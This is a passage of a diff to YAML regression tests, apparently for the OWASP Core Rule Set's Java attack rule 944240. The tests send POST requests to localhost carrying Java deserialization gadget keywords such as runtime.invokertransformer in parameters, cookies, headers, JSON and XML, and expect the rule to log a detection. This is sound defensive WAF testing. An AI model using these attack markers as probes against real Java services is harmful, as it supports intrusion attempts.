\"944240\"" + - test_id: 32 desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatefactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatefactory\"}" + output: + log_contains: "id \"944240\"" + - test_id: 33 desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.instantiatefactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_id: 34 desc: "Argument test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 35 desc: "Argument name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-36 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer=test" + output: + log_contains: "id \"944240\"" + - test_id: 36 desc: "Cookie test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 37 desc: "Cookie name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 38 desc: "Request header test includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 39 desc: "XML attribute value includes keyword 
runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 40 desc: "XML element value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 41 desc: "Nested XML element value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 42 desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_id: 43 desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatetransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_id: 44 desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 
944240-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.instantiatetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_id: 45 desc: "Argument test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_id: 46 desc: "Argument name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer=test" + output: + log_contains: "id \"944240\"" + - test_id: 47 desc: "Cookie test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 48 desc: "Cookie name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - 
Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.invokertransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.invokertransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 49 desc: "Request header test includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.invokertransformer + 
method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_id: 50 desc: "XML attribute value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_id: 51 desc: "XML element value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_id: 52 desc: "Nested XML element value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_id: 53 desc: "Content-Type text/plain includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_id: 54 desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.invokertransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.invokertransformer\"}" + output: + log_contains: "id \"944240\"" + - test_id: 55 desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"{\"runtime.invokertransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.invokertransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_id: 56 desc: "Argument test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_id: 57 desc: "Argument name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory=test" + output: + log_contains: "id \"944240\"" + - test_id: 58 desc: "Cookie test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + 
